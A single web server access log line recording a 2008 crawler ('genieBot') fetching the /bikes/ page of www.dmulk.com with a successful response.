64.5.245.21 - - [10/Jan/2008:11:09:13 -0800] "GET /bikes/ HTTP/1.0" 200 2036 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
